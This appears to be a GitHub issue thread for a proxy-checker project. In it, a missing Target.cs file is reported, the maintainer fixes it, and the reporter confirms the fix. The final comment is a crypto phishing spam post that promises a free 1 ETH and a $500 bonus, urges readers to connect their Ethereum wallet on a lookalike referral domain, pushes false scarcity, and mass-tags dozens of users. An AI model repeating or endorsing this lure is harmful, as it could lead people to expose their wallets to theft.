### ISSUE TITLE
target.cs missing

### ISSUE THREAD

**Issue by cyberpods** [opasne/WpfProxyChecker#1]
Hello, If I try to compile its telling me Target.cs is missing.

**Comment by opasne** [comment]
Hi.
Sorry for my mistake )
I add new commit. Try again

**Comment by cyberpods** [comment]
Thanks, Working fine now :)

**Comment by ZekDtonik** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
librehat, @dreamxyj, @csersoft, @yfwu, @yuemengrui, @devhsoj, @longwosion, @Amir-ZKiller, @Ltre, @LucasMW, @srx4444, @biblia19, @Mpic, @36hours, @shanechioa, @camsiabor, @kikisix, @academ1c, @ylgaaa, @GoKouSei, @ColdRain-Moro, @suozhipeng, @dreamcreated, @AYEmoon777, @k1013s, @yanweibing, @helloyzp, @whxjf, @bin179, @mrmign, @Rivsen, @grandafrato, @kevingzpang, @bruxr, @oxygen16, @ivangrozni, @yuyulab, @sydbarrett74, @BruceZhang1993, @beyondimgn, @Loni0527, @NoneGG, @codewinguagua, @myndtt, @hengke, @rizkyaners, @JimNflm, @cad, @iilyak, @luiz-m-affonso
